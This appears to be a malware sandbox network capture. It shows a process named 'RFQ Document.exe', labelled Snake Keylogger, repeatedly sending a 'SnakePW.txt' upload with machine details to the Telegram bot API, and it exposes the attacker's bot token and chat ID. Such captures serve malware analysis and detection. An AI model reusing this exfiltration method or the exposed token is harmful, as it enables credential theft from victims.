                                            2021-09-28 05:58:25 UTC36OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 39 35 37 34 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c4957484Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:25 UTC37INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:25 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:25 UTC37INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12603,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808705,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            230192.168.2.450051149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:34 UTC365OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eddc1e0b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:34 UTC366OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 64 63 31 65 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eddc1e0bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:34 UTC366INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:34 UTC366INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12817,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808774,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            231192.168.2.450052149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:34 UTC367OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255edf3f502
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:34 UTC367OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 66 33 66 35 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255edf3f502Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:34 UTC368INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:34 UTC368INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12818,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808774,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            232192.168.2.450053149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:34 UTC369OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ee0bccbd
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:34 UTC369OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 30 62 63 63 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ee0bccbdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:35 UTC369INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:35 UTC370INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12819,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            233192.168.2.450054149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:35 UTC370OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ee391976
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:35 UTC370OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 33 39 31 39 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ee391976Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:35 UTC371INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:35 UTC371INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12820,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            234192.168.2.450055149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:35 UTC372OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ee4ea61c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:35 UTC372OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 34 65 61 36 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ee4ea61cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:35 UTC372INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:35 UTC373INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12821,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            235192.168.2.450056149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:35 UTC373OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ee6d8d55
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:35 UTC374OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 36 64 38 64 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ee6d8d55Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:35 UTC374INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:35 UTC374INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12822,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            236192.168.2.450057149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:35 UTC375OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ee8c8b87
                                            Host: api.telegram.org
                                            Content-Length: 407
